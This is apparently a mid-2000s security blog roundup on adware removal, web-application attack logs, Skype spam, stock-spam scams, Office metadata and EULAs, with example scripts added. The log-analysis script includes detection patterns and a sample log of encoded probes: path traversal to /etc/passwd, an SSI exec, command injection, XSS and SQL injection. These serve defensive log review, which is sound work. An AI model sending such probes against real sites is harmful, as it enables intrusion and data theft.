# Google Blog Search Oct 2
# Writely Oct 2
# Gmail Oct 1
Also worthy of mention is the Hot 100. The author measures this using "The hottest betas in the webosphere, as measured by the number of bookmarks at del.icio.us added within the last 7 days." Updated each Sunday.
- Dell Decrappifier- From Cluttered to Pristine
It appears this fellow isn't the only one tired of getting lots of "useful addons" on his new PC from Dell. Rather than ship a virgin system, Dell has money-making deals to include certain forms of adware or sponsored search engines, and they pocket the change.
This, in theory, is OK, depending on what the Dell EULA states, but what about users who do not want all of the extraneous stuff, trial installations and other unwanted programs? This person took matters into his own hands by creating and running a very simple file.
Enter the Dell Decrappifier, a script that hopefully returns your PC to its pristine state before all the marketing deals take over your coveted resources.
From their website:
It's a sad state of affairs when you buy a new computer these days and it comes pre-loaded with a ton of garbage software that brings your new machine to a crawl. If anyone's bought a Dell PC in the last few years, you probably know what I'm talking about. Just recently, I was helping a friend set up his brand new Inspiron 1300 and it took FOREVER for it to boot up. It's a very dissatisfying experience to pull a brand new computer out of the box and be spammed with a bunch of trial software. After removing all of the crap (which took a significant amount of time) it booted much faster and performed like it should. I kept thinking it would be nice to have an automated way to remove all this stuff. Thus was born the Dell De-Crapifier script.
Now, to be fair, I know most all of the major PC manufacturers have similar practices of installing trialware. I would suspect they don't make any profit on the hardware (or even a loss) and they make their money on the kickbacks from the software companies. I don't know.
Anyway, I wrote the Dell De-Crapifier using a great little scripting tool called AutoIT. You can use it to automate pretty much anything in Windows. There is also a cool editor called SciTE that gives you all the tools you need to put together a script. The best thing about this whole system is that you can generate stand alone executables that don't require a runtime.

Visit the Dell Decrappifier to see it in action. Read *carefully* before you download the file and use!
- The Attack on Web Applications- Using Jedi Foresight
Level: Advanced
While conducting log analysis around a new web application we have been developing, the ever vigilant Obijan noticed what appears to be an individual using automated tools to probe the application in several nefarious ways. We can also assume that they are running the same styles of attack on all forms sitewide.
For example here we see attempts at:
- SQL Injection
- Path Traversal
- Remote Execution
- SSI (Server Side Includes)
- XSS (Cross Site Scripting)
The requests originated from this IP address: 69.3.195.226.
OrgName: Covad Communications Co.
OrgID: CVAD
Address: 2510 Zanker Rd.
City: San Jose
StateProv: CA
PostalCode: 95131
Country: US
Fortunately all the attacks were unsuccessful, but it is something to always keep in mind when designing applications. Any application you put online will be found by spiders and will be hammered at in any way, shape or form possible.
Here is a sample of some of the not so nice "requests" this person made.
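The kind of log review described above, as an added example that is not part of the original post: it parses combined-format access log lines, percent-decodes each request target (twice, and with NUL bytes stripped, since scanners use both tricks), tags it with the probe categories the post lists, and flags a source that works through several categories as a likely automated tool. The log lines and the addresses in them are constructed samples, not the post's data.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Request-line parser for the Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Probe signatures, applied to the percent-decoded request target. The shapes
# mirror the five categories the post lists; they are deliberately narrow
# (a lone quote or the bare word "id" would flag ordinary traffic).
SIGNATURES = {
    "Path Traversal": re.compile(
        r"(\.\.[\\/]|\.\\\./|/etc/passwd|boot\.ini|conf/server\.xml)", re.I),
    "SSI": re.compile(r"<!--#\s*(exec|include|echo|config)\b", re.I),
    "Remote Execution": re.compile(
        r"([|;`]\s*(id|dir|cat|ls|uname)\b|/bin/[a-z]+\b|`[^`]+`)", re.I),
    "XSS": re.compile(
        r"(<\s*script|javascript:|vbscript:|on(load|error)\s*=|expression\s*\()", re.I),
    "SQL Injection": re.compile(
        r"('\s*(or|and)\s+['\d]|union\s+select|'\s*--|;\s*(drop|select|insert|update)\b)",
        re.I),
}


def decode_target(target):
    """Percent-decode twice so double-encoded probes (%252e%252e%252f) are seen,
    then drop NUL bytes, which scanners insert to split keywords (<%00script>)."""
    return unquote_plus(unquote_plus(target)).replace("\x00", "")


def classify(target):
    """Sorted list of probe categories a single request target matches."""
    decoded = decode_target(target)
    # CSS/JS escape evasion (expre\ssion, @im\port): the script check runs on a
    # backslash-free copy; the traversal check still needs the backslashes.
    unescaped = decoded.replace("\\", "")
    hits = []
    for name, pattern in SIGNATURES.items():
        text = unescaped if name == "XSS" else decoded
        if pattern.search(text):
            hits.append(name)
    return sorted(hits)


def parse_line(line):
    """Fields of one log line as a dict, or None if the line is not parseable."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def summarise(lines):
    """Map each source IP to a Counter of probe categories seen from it."""
    per_ip = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for category in classify(rec["target"]):
            per_ip[rec["ip"]][category] += 1
    return per_ip


def scanner_candidates(per_ip, min_categories=3):
    """Sources that hit several distinct probe classes: the signature of an
    automated tool working through its whole checklist against one form."""
    return sorted(ip for ip, c in per_ip.items() if len(c) >= min_categories)


# Constructed sample log (documentation-range addresses, not the post's IP).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Apr/2006:09:12:01 -0400] "GET /search?q=%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2006:09:12:02 -0400] "GET /search?q=%3C%21--%23exec%20cmd%3D%22%2Fbin%2Fcat%20%2Fetc%2Fpasswd%22--%3E HTTP/1.1" 200 1033 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2006:09:12:03 -0400] "GET /search?q=%7Cid%7C HTTP/1.1" 200 1033 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2006:09:12:04 -0400] "GET /search?q=%3Cscript%3Ealert%28%27PROBE%27%29%3C%2Fscript%3E HTTP/1.1" 200 1033 "-" "Mozilla/4.0"
203.0.113.7 - - [18/Apr/2006:09:12:05 -0400] "GET /search?q=%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 233 "-" "Mozilla/4.0"
198.51.100.4 - - [18/Apr/2006:09:13:10 -0400] "GET /search?q=spyware+warriors HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    summary = summarise(SAMPLE_LOG.splitlines())
    for ip, counts in summary.items():
        print(ip, dict(counts))
    print("likely scanners:", scanner_candidates(summary))
```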
- Pondering Security and My Perspective...
Any given day of the week (and many weekends) I keep myself busy with the task of trying to ensure that end-users' computers are free of whatever the spy / ad / greyware of the day might be, making sure that their shopping habits or surfing history are not transmitted to some faceless company. It is a never-ending struggle.
It came as a bit of a wakeup call that, no matter what I do to keep the desktop clean, there are still other dangers out there.
It turns out that all the Internet traffic in my hometown is being funnelled, collected and forwarded on a massive scale. Let's sidestep the obvious violations of privacy here for a second. We have terabytes of daily traffic being collected and stored in large repositories. How sweet of a target would that be for any scam artist? A skilled cracker? The Mob? I can only imagine, given a day's worth of all San Francisco e-mail and IM traffic, what one could rake in with a simple (automated?) blackmail scheme...
Won't happen? There must be tight security measures in place to protect against these things, right?
Eh... On the same day another story broke. The "border security" system which is supposed to protect the US from terrorists (fellow "Aliens" know this as "the gizmo with the cheap webcam and flaky fingerprint reader") was taken to its knees by a stray worm because of unpatched computers.
Darn it. Should have taken the blue pill!
- My First Experience with SKYPE Spim / Spam- Instant Classic
Skype, recently acquired by eBay, is becoming a very popular Instant Messaging client. You can text chat, hold conferences, send files and, most importantly, talk in real time with wonderful clarity. Not only can you talk to those on your Skype list, but you can also buy credits to dial out to real-world lines. Skype is a proprietary peer-to-peer Internet telephony (VoIP) network, founded by Niklas Zennstrom and Janus Friis, the creators of KaZaA.
I have been using Skype for some time, but never before had I received an unsolicited commercial message in my months of usage. In e-mail this is commonly called spam; on instant messaging networks it is called SPIM. In short, someone contacts you hawking goods and wares, or anything else you don't want. You don't know them, you did not contact them, and you did not opt in to be contacted by them; they simply hammer out commercial messages in the hope that someone will buy.
I found this case particularly interesting because, as I said before, I had never received SPIM through Skype (and fortunately it is easy to block a user). In this case I decided to "play" with the spammer to gauge their response and have some fun and games.
Would they ignore me? Hit me with more unwanted spam? Or are they truly ignorant? Find below the full transcript of our "conversation". Obviously, near the end I was pretending to execute various "commands" on her machines, when in reality I was doing nothing but typing in all caps to simulate a "look up" of who they were.
This spammer was not harmed in the incident, but let's hope they don't do it again. Read on...
The first part of the transcript is the list of brand new phones they sell; below it you will find our "dialogue" and my simulated geolocation commands as I tried to steer this spammer onto the path of not doing it again. I doubt that will work, but it is amusing nonetheless. More below...
[1:40:47 PM] nikky vo... says: Hello,
We are phones and laptops manufacturers of MEGA WORLD INTERNATIONAL LTD, we sell phones and laptops at very cheap rate. If you require our goods which also include electronics gadgets, get back to me on our company email address (
phonesbonanza@yahoo.com or also on this email address
megaworldcomputers@yahoo.com)
VIEW OUR PRICE LIST BELOW -- ALL BRAND NEW UNITS:
Models: Price:
Nokia 1100-- US$55
Nokia 2100-- US$45
Nokia 2300-- US$60
Nokia 3100-- US$65
Nokia 3108-- US$60
Nokia 3200-- US$75
Nokia 3230-- US$95
Nokia 3300 - US$85
Nokia 3310-- US$25
Nokia 3315-- US$29
Nokia 3330-- US$30
Nokia 3350-- US$35
Nokia 3410-- US$35
Nokia 3510-- US$40
Nokia 3510i-- US$45
Nokia 3530-- US$50
Nokia 3595-- US$45
Nokia 3610-- US$55
Nokia 3650-- US$100
Nokia 3660-- US$105
Nokia 5100-- US$65
Nokia 5140-- US$110
Nokia 5210-- US$40
Nokia 5510-- US$105
Nokia 5550-- US$50
Nokia 5170iR-- US$39
Nokia 6020-- US$130
Nokia 6670-- US$105
Nokia 6100-- US$80
Nokia 6108-- US$90
Nokia 6220-- US$100
Nokia 6230-- US$90
Nokia 6260-- US$135
Nokia 6310-- US$69
Nokia 6310i-- US$70
Nokia 6500-- US$60
Nokia 6510-- US$60
Nokia 6600-- US$135
Nokia 6610-- US$80
Nokia 6630-- US$175
Nokia 6170-- US$145
Nokia 6650-- US$82
Nokia 6800-- US$105
Nokia 6820-- US$110
Nokia 7200-- US$125
Nokia 7210 Turquoise-- US$90
Nokia 7230-- US$100
Nokia 7250-- US$100
Nokia 7250i-- US$100
Nokia 7260-- US$135
Nokia 7280-- US$155
Nokia 7600-- US$165
Nokia 7610-- US$105
Nokia 7650-- US$120
Nokia 7710--US$130
Nokia 770--US$110
Nokia 8250-- US$65
Nokia 8310-- US$90
Nokia 8910 Titanium-- US$110
Nokia 8910 Black-- US$125
Nokia 8910i-- US$100
Nokia 8890-- US$90
Nokia 8850 Special Edition-- US$80
Nokia 8850 Gold Edition-- US$90
Nokia 8855-- US$115
Nokia 9210 Communicator-- US$105
Nokia 9210i Communicator-- US$100
Nokia N-Gage-- US$110
Nokia 9500 (communicator)-- US$120
N91--US$150
N90--US$180
N70---US$200
Nokia--vertuUS$300
And more........
Sony Ericsson P800-- US$100
Sony Ericsson P900-- US$120
Sony Ericsson P910i-- US$100
Sony Ericsson T20e-- US$35
Sony Ericsson T20s-- US$39
Sony Ericsson T28s-- US$39
Sony Ericsson T28 World-- US$45
Sony Ericsson T29s-- US$49
Sony Ericsson T100-- US$30
Sony Ericsson T105-- US$35
Sony Ericsson T200-- US$45
Sony Ericsson T230-- US$55
Sony Ericsson T300-- US$55
Sony Ericsson T310-- US$50
Sony Ericsson T600-- US$69
Sony Ericsson T610-- US$90
Sony Ericsson T630-- US$85
Sony Ericsson T68i-- US$70
Sony Ericsson T68m-- US$80
Sony Ericsson Z200-- US$80
Sony Ericsson Z600-- US$90
Sony CMD-J5-- US$30
Sony CMD-Z7-- US$35
Sony CMD-J7-- US$40
Sony CMD-J6-- US$40
Sony CMD-Z5-- US$90
Sony CMD-MZ5-- US$105
Sony Ericsson R520m-- US$90
Sony Ericsson R380 World-- US$90
Sony Ericsson R380s-- US$105
Sony Ericsson R600-- US$35
Sony Ericsson S700-- US$100
Sony Ericsson K500i-- US$100
Sony Ericsson K700i-- US$100
sony Ericson w800i-- US$200
And more........
Samsung SGH A200-- US$50
Samsung SGH A300-- US$40
Samsung SGH A500-- US$70
Samsung SGH A800-- US$70
Samsung SGH C100-- US$85
Samsung SGH E400-- US$125
Samsung SGH E600-- US$129
Samsung SGH E700-- US$100
Samsung SGH E720-- US$200
Samsung SGH E715-- US$100
Samsung SGH-E810-- US$100
Samsung SGH-E820-- US$90
Samsung SGH-E800-- US$80
Samsung SGH-E850-- US$140
Samsung SGH D410-- US$150
Samsung SGH D500-- US$155
Samsung SGH P400-- US$135
Samsung SGH P510-- US$90
Samsung SGH N188-- US$80
Samsung SGH N288-- US$60
Samsung SGH N500-- US$60
Samsung SGH N620-- US$60
Samsung SGH M100-- US$45
Samsung SGH P400-- US$140
Samsung SGH P410-- US$145
Samsung SGH P500-- US$155
Samsung SGH Q105-- US$40
Samsung SGH Q300--- US$70
Samsung SGH R220-- US$30
Samsung SGH R225-- US$25
Samsung SGH S100-- US$90
Samsung SGH S200-- US$100
Samsung SGH S300-- US$105
Samsung SGH S307-- US$130
Samsung SGH S500-- US$109
Samsung SGH T100-- US$100
samsung SGH S105-- US$35
Samsung SGH T200-- US$125
Samsung SGH T400-- US$60
Samsung SGH T500-- US$90
Samsung SGH T700-- US$99
Samsung SGH V200-- US$105
Samsung SGH VM680-- US$100
Samsung SGH X400-- US$105
Samsung SGH X410-- US$130
Samsung SGH X426-- US$129
Samsung SGH-C200-- US$125
Samsung SGH-X460-- US$140
Samsung SGH-X450-- US$130
Samsung SGH-X120-- US$99
Samsung SGH X600-- US$145
Samsung SGH-X610-- US$140
Samsung SGH-Z105-- US$120
And more...
Motorola A008-- US$50
Motorola A388-- US$70
Motorola A388c-- US$120
Motorola A820-- US$65
Motorola A780--$200
Motorola C330-- US$20
Motorola C331-- US$25
Motorola C332-- US$30
Motorola C333-- US$35
Motorola C350-- US$69
Motorola E360-- US$60
Motorola E365-- US$110
Motorola E380-- US$95
Motorola E398-- US$125
Motorola MPX200-- US$180
Motorola Accompli 008-- US$49
Motorola Timeport 280-- US$80
Motorola T190T-- US$25
Motorola Talkabout 191-- US$25
Motorola T720-- US$65
Motorola T720i-- US$85
Motorola V3Razor-- US$100
Motorola V66-- US$60
Motorola V60-- US$70
Motorola V60i-- US$75
Motorola V70-- US$105
Motorola V80-- US$115
Motorola V290-- US$80
Motorola V750-- US$125
Motorola V3688+-- US$20
Motorola V8088-- US$30
Motorola V525-- US$120
Motorola V300-- US$100
Motorola V400-- US$125
Motorola V500-- US$100
Motorola V600-- US$120
Motorola mpx --US$200
And more.....
Siemens A35-- US$15
Siemens A40-- US$19
Siemens A50-- US$25
Siemens A52-- US$29
Siemens A55-- US$30
Siemens C45-- US$30
Siemens C55-- US$35
Siemens CL50-- US$70
Siemens CL55-- US$65
Siemens CT56-- US$30
Siemens M50-- US$35
Siemens M55-- US$120
Siemens MC60-- US$79
Siemens ME45-- US$50
Siemens S45-- US$60
Siemens SL42-- US$65
Siemens SL45i-- US$69
Siemens S55-- US$85
Siemens SL55-- US$125
Siemens SX45-- US$155
Siemens SX1-- US$180
Siemens Xelibri 1-- US$60
Siemens Xelibri 2-- US$50
Siemens Xelibri 3-- US$80
Siemens Xelibri 4-- US$80
Siemens Xelibri 5-- US$65
Siemens Xelibri 6-- US$85
Siemens Xelibri 7-- US$85
Siemens Xelibri 8-- US$95
siemens Xk65 US$200
And more.....
Panasonic G50-- US$80
Panasonic G51-- US$95
Panasonic GD35-- US$20
Panasonic GD52-- US$25
Panasonic GD55-- US$49
Panasonic GD67-- US$39
Panasonic GD75-- US$45
Panasonic GD87-- US$125
Panasonic GD88-- US$129
Panasonic GD90-- US$30
Panasonic GD92-- US$30
Panasonic GD93-- US$20
Panasonic GD95-- US$39
Panasonic X70-- US$120
Panasonic X66-- US$110
Panasonic X68-- US$115
Panasonic A101-- US$90
Panasonic A102-- US$100
And more....
Alcatel OneTouch 301-- US$20
Alcatel OneTouch 302-- US$25
Alcatel OneTouch 303-- US$30
Alcatel OneTouch 511-- US$35
Alcatel OT525-- US$39
Alcatel One Touch 501-- US20
Alcatel One Touch 311-- US$25
Alcatel One Touch 701-- US$30
Alcatel One Touch 512-- US$40
Alcatel One Touch 715-- US$55
And more.....
NEC N830-- US$85
NEC N710-- US$70
NEC C616-- US$110
NEC N900-- US$100
NEC N820-- US$80
NEC N910-- US$100
NEC N700-- US$55
And more......
Sharp GX1-- US$99
Sharp GX10-- US$110
Sharp GX10i-- US$110
Sharp GX15-- US$110
Sharp GX20-- US$125
Sharp GX30-- US$135
And more....
Philips Fisio 120-- US$25
Philips Fisio 311-- US$30
Philips Fisio 620-- US$35
Philips Fisio 825-- US$35
Philips Ozéo 8@8-- US$45
Philips Xénium-- US$45
Philips Fisio 820 + Kit Blue-- US$49
And more....
Nextel i55sr-- US$65
Nextel i2000plus-- US$35
Nextel i58sr-- US$30
Nextel i530-- US$35
Nextel i205-- US$20
Nextel i305-- US$25
Nextel i35s-- US$29
Nextel i88-- US$30
Nextel i90-- US$59
Nextel i95cl-- US$70
Nextel i60c-- US$40
Nextel 6510TM-- US$100
Nextel i730-- US$85
Nextel i733-- US$95
Nextel i736-- US$105
Nextel i830-- US$115
Nextel i860-- US$105
Nextel i930-- US$100
And more...
Audiovox 8500-- US$30
Audiovox 8300-- US$39
Audiovox 9100-- US$15
Audiovox 9150-- US$75
Audiovox 9155-- US$35
And more....
kyocera 5135-- US$10
kyocera 2035-- US$25
kyocera 7135-- US$10
....kyocera 2135-- US$25
[1:53:32 PM] Wayne P... says: Nikky you are aware I work with the Skype Spim Department?
[2:06:30 PM] nikky vo... says: ?
[2:08:17 PM] Wayne P... says: Nikky- you are sending unwanted commercial messages. Furthermore they are accompanied by some sort of subliminal sound which I am recording for analysis in our backmasking lab.
[2:08:43 PM] Wayne P... says: Spim- is spam through an IM network. You are aware of the ramifications of this?
[2:10:36 PM] nikky vo... says: what do you mean?
[2:10:52 PM] nikky vo... says: cant i advertise my goods
[2:11:08 PM] Wayne P... says: Not in this fashion. Perhaps you should read up on Internet law.
[2:12:02 PM] Wayne P... says: about unwanted advertising through various channels like e-mail and IM services. We have no prior business relationship, I have not opted in to receive your ads- thus this is considered spam.
[2:12:35 PM] Wayne P... says: Unfortunately this is a severe violation. Especially with the strange subliminal sound you are playing in background.
[2:13:09 PM] Wayne P... says: Nikky. Would you want me to do this to you?
[2:13:54 PM] Wayne P... says: OK. You leave me no choice. I must file an official complaint and get you in a lot of trouble unless you can promise you will never do this again.
[2:15:34 PM] nikky vo... says: can u pls tell me where to advertise
[2:16:50 PM] Wayne P... says: Nikky I am not a consultant but there are other options. For example Yahoo offers advertising, as does Google Adwords, you could auction goods on ebay or build a storefront with Yahoo and promote your website through quality content and build a respectable business.
[2:17:23 PM] Wayne P... says: INITIATING REVERSE IP TRACE...
[2:17:38 PM] Wayne P... says: OBTAINING GEOLOCKING PARAMETERS...STANDBY
[2:18:44 PM] Wayne P... says: PARAMETERS OBTAINED. ENTERING HEX SHELL...
[2:18:56 PM] Wayne P... says: >COMMAND OP GEOLOCATE
[2:19:03 PM] nikky vo... says: ????????
[2:19:05 PM] Wayne P... says: >DUMP TRACE
[2:19:48 PM] Wayne P... says: TRACE DUMP COMPLETE...STANDBY
[2:19:54 PM] Wayne P... says: ABUSE REPORT SENT
[2:20:08 PM] Wayne P... says: >EXIT HEX SHELL
[2:20:31 PM] nikky vo... says: what the hell u saying?
[2:20:47 PM] Wayne P... says: PLOTTING TO GOOGLE MAPS API
[2:21:32 PM] Wayne P... says: ENTERING HEX SHELL
[2:22:03 PM] Wayne P... says: >PLOT IP ADDRESS NIKKY VONNE // > GOOGLE MAPS API
[2:22:11 PM] Wayne P... says: >EXECUTE LOCATE RESIDENCE
[2:22:56 PM] Wayne P... says: STANDBY. PROCESSING GEOLOCATION.
[2:23:23 PM] Wayne P... says: TARGET MAPPED. CONTACT REPORT SENT TO SPAM OFFICIALS.
[2:23:41 PM] Wayne P... says: >EXIT HEX SHELL
[2:23:58 PM] Wayne P... says: INITIATE BLOCKING PROTOCOLS
[2:24:11 PM] Wayne P... says: TERMINATING CONNECTION IN
[2:24:27 PM] Wayne P... says: 10...9...8...7...6...5...4...3...2...1..
- Pump & Dump Stock Picks- How to Avoid
Did you know we had a Mail Bag? We do! Our team, including two MSFT Security MVPs, selects good questions from the Mail Bag and gives them our best shot.
Question: I receive lots of hot stock tips in my email. Are these legitimate stocks? Should I invest?
Disclaimer: We don't give investment advice...but what you are referring to is commonly called a Pump & Dump stock scam.
Like many people you probably get a lot of spam, even with the better filters we have today. Have you ever noticed how many spams are touting a particular stock? Usually this is a thinly traded stock on a small exchange going for only pennies a share. In a recent honeypot study it was found that 3% of all the spam collected was actually pump & dump scams! Still, at pennies a share it seems so easy to make money! Not so.
New research was released recently about these "pump and dump" schemes. The way it works is that the stock owners or holders send out massive amounts of spam touting their stock, sometimes resorting to pumping it up on stock-related message boards with false or misleading claims.
What was really interesting in this study is that the researchers found the more spam was sent, the higher the stock price went. Naturally the scamsters unload the stock as it peaks, and the regular investors are left holding the bag.
Answer: If you get e-mails like these, simply hit delete. They are more than likely scammers' tricks stacked against you in order to part you from your hard-earned money. The only ones profiting from these "spam e-mail tips" are the senders themselves, in this case the spammers.
For more on Pump & Dump Stock Scams read this illuminating article.
If you still aren't sure, check out this savvy fellow who charted a variety of spam-touted stocks and see for yourself just how "good" the returns were: Spamstocktracker.com. We suspect that some of these fraudsters might be using botnets as spam relays so they can send out literally millions of these pitches for thinly traded, dubious equities.
Imagine that: a whole legion of zombie machines working OTC stocks. Again, hit delete and don't fall for it.
- Getting Rid of Meta Data...The Hidden Trail You May Not Know About
Office 2003/XP Add-in: Remove Hidden Data
We talked about this a couple of years ago, but as tips and tricks go it is a must-have in your privacy toolset, and best of all it's free.
Did you know that when you edit a Microsoft Word document there are all kinds of hidden meta-data in the document that you cannot see? With this little add-in you can permanently remove hidden and collaboration data, such as change tracking and comments, from Word 2003/XP, Excel 2003/XP, and PowerPoint 2003/XP files. If only certain government officials had known about this tool, since meta-data has led to a few scandals in the past!
The Remove Hidden Data add-in is a tool that you can use to remove personal or hidden data that might not be immediately apparent when you view the document in Microsoft Office. The tool is free but only works with Office 2003/XP.
Here is sample output on a file that has had hidden data removed.
C:\Documents and Settings\Docs\My Documents\file.doc scanned at 1:49:55 PM on 3/30/2004
Different revisions of document not found.
Comments not found.
Early document versions not found.
Document template other than normal not found.
VB Module descriptions failed to remove. Reason: If the "Trust Access to Visual Basic Project" security setting is disabled, the tool cannot determine if the document contains a macro. Macros might contain personal information. Review security settings and macros and delete any that contain personal information.
Smart Tags found and removed.
SendForReview RCIDs not found.
Store random number in the document check found and removed.
Embedded objects not found.
Hidden Text not found.
Same-color text not found.
Custom properties not found.
Header and footer not found.
Hyperlinks found and user prompted. Result: kept
File Paths not found.
Bookmarks not found.
DSNs not found.
Field Codes not found.
VB Modules not found.
C:\Documents and Settings\Docs\My Documents\file.doc scanning complete
Pretty handy! Here is the skinny from the Microsoft site and where to get the free tool...we recommend you add it to your digital toolbox.
With this add-in you can permanently remove hidden and collaboration data, such as change tracking and comments, from Word 2003/XP, Excel 2003/XP, and PowerPoint 2003/XP files.
When you distribute an Office document electronically, the document might contain information that you do not want to share publicly, such as information you’ve designated as "hidden" or information that allows you to collaborate on writing and editing the document with others.
The Remove Hidden Data add-in is a tool that you can use to remove personal or hidden data that might not be immediately apparent when you view the document in your Microsoft Office application.
You can run the Remove Hidden Data add-in on individual files from within your Office XP or Office 2003 application. Or, you can run Remove Hidden Data on multiple files at once from the command line. In either case, to run the tool you must have the application installed in which the document was created.
The Offrhdreadme.htm file included with the add-in includes a complete list of all of the types of data that the tool will help to remove. By default, you can locate this file in the \Program Files\Microsoft Office\Remove Hidden Data Tool\1033 directory in the drive where you installed the tool. If you installed the tool to a different directory, you can locate this file in the \1033 directory, a subdirectory of the add-in installation folder.
Notes
- You should run the Remove Hidden Data add-in on files when you are ready to publish them. This is because some of the data that the tool removes is used by Office for collaboration features, such as Track Changes, Comments, and Send for Review.
- You should always save to a new file name, rather than overwrite the original file with the new document, in order to preserve a copy of the document containing the original data.
- The Remove Hidden Data add-in does not work with Information Rights Management-protected or digitally-signed files.
Download- Remove Hidden Data Tool
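The same pre-publication checklist the add-in's log walks through (author metadata, comments, tracked changes, hidden text, custom properties, attached template), as an added example that is not Microsoft's code: the add-in covers the Office 2003/XP binary formats, while this script applies the checklist to the zip-based .docx format, reading the standard OOXML parts by name. The sample document it scans is constructed in memory, not a real file.

```python
import io
import re
import zipfile

# Each check: (label, OOXML part name, regex that indicates the data is present).
# Part and element names are the standard WordprocessingML ones.
CHECKS = [
    ("Author/last editor metadata", "docProps/core.xml",
     re.compile(r"<(dc:creator|cp:lastModifiedBy)>[^<]+<")),
    ("Comments", "word/comments.xml", re.compile(r"<w:comment\b")),
    ("Tracked changes", "word/document.xml", re.compile(r"<w:(ins|del)\b")),
    ("Hidden text", "word/document.xml", re.compile(r"<w:vanish\b")),
    ("Custom properties", "docProps/custom.xml", re.compile(r"<property\b")),
    ("Document template other than Normal", "word/settings.xml",
     re.compile(r"<w:attachedTemplate\b")),
]

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def scan_docx(data):
    """Return the labels of the hidden-data categories present in a .docx blob."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = set(zf.namelist())
        for label, part, pattern in CHECKS:
            if part in members and pattern.search(zf.read(part).decode("utf-8", "replace")):
                found.append(label)
    return found


def report(data):
    """One line per category, in the style of the add-in's own log output."""
    found = set(scan_docx(data))
    return "\n".join(
        f"{label} {'found' if label in found else 'not found'}." for label, _, _ in CHECKS)


def build_sample_docx(with_hidden_data):
    """Construct a minimal .docx in memory (a constructed sample, not a real file).
    With hidden data it carries an author, a comment, a tracked insertion and a
    hidden run; without it, the same parts are present but scrubbed."""
    creator = "Jane Doe" if with_hidden_data else ""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/'
        'metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/">'
        f'<dc:creator>{creator}</dc:creator><cp:lastModifiedBy>{creator}</cp:lastModifiedBy>'
        '</cp:coreProperties>'
    )
    body = '<w:p><w:r><w:t>Public text.</w:t></w:r></w:p>'
    if with_hidden_data:
        body += ('<w:p><w:ins w:id="1" w:author="Jane Doe"><w:r><w:t>late edit</w:t></w:r>'
                 '</w:ins></w:p>'
                 '<w:p><w:r><w:rPr><w:vanish/></w:rPr><w:t>internal note</w:t></w:r></w:p>')
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body>{body}</w:body></w:document>'
    )
    comments = (
        f'<w:comments xmlns:w="{W_NS}"><w:comment w:id="0" w:author="Jane Doe">'
        '<w:p><w:r><w:t>fix before release</w:t></w:r></w:p></w:comment></w:comments>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docProps/core.xml", core)
        zf.writestr("word/document.xml", document)
        if with_hidden_data:
            zf.writestr("word/comments.xml", comments)
    return buf.getvalue()


if __name__ == "__main__":
    print(report(build_sample_docx(True)))
```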
- Phishing- What is it in a Nutshell?
Phishing is a form of criminal activity using social engineering or trickster techniques to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message. The term phishing arises from the use of increasingly sophisticated lures to "fish" for users' financial information and passwords.
Phishing attempts that target employees of a particular company are often called "Spear Phishing". A bill called the Anti-Phishing Act of 2005 is currently under debate, and community-driven efforts to go after phishers are also underway, such as the Phried Phish project from Castlecops, where you can submit phishing addresses and skilled hunters will pursue them and get them shut down!
Coming soon...a bevy of tools and techniques to help protect yourself from phishing.
- Research in Progress...From The Mountains of WV
Ever wonder what the inside of part of an anti-spyware lab might look like? What actual researchers do? This short segment aired on WSAZ, an MSNBC affiliate profiling our Huntington, West Virginia research team.
But there's more coming up! Check out the teaser for the two-part podcast that Chris Boyd and I recorded with Jeff Molander, profiling what we see in the trenches of the Internet and giving information on our team's latest bust. I think it will truly "shock and awe" some listeners. Check out Spyware Warriors and the Digital Underground Teaser [mp3 format]
- EULA Madness Tinko Pal Revisited With Commentary
I am really ready to start tackling EULAs, so to kick things off I am revisiting a piece I did on the TinkoPal EULA months ago. Take a close look as I highlight some of the language and conditions you would accept in this EULA. For added value my comments will be in bold text surrounded by parentheses and are not a part of the EULA.
TinkoPal EULA Page: http://www.tinkopal.com/terms.html
Note: The original EULA is no longer valid at this URL.
** Flesch Grade: 22 = Beyond Twelfth Grade Reading Level. I mention this because EULA dissection is part of the analysis strategy we have put in place at Facetime Security Labs; I promise much more on that soon! In this case, to receive your Tinkopal and whatever might come along with it (the world is full of surprises), the agreement you accept is well beyond the 12th grade reading level. I hope you have a college degree handy.
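As an added illustration of the readability check behind that Flesch grade (example code written for this page, not Facetime Security Labs' own tooling): the Flesch-Kincaid grade-level formula applied to Sentence 7 of the EULA quoted below. The syllable counter is a vowel-group heuristic, so the score is an approximation.

```python
import re

# Flesch-Kincaid Grade Level and Flesch Reading Ease, the measures behind a
# "Flesch Grade" figure. Added example; syllables are estimated heuristically.

# Constructed sample: Sentence 7 of the TinkoPal EULA as quoted in the post.
SENTENCE_7 = (
    "TinkoPal may from time to time, at its sole discretion, provide "
    "automatic upgrades to the Software through electronic dissemination "
    "and other means to add capabilities, functionality, or enhancements "
    "and may also include third party applications with its upgrades."
)


def count_syllables(word: str) -> int:
    """Approximate syllables as runs of vowels, dropping a trailing silent e."""
    w = re.sub(r"[^a-z]", "", word.lower())
    if not w:
        return 0
    n = len(re.findall(r"[aeiouy]+", w))
    if w.endswith("e") and not w.endswith("le") and n > 1:
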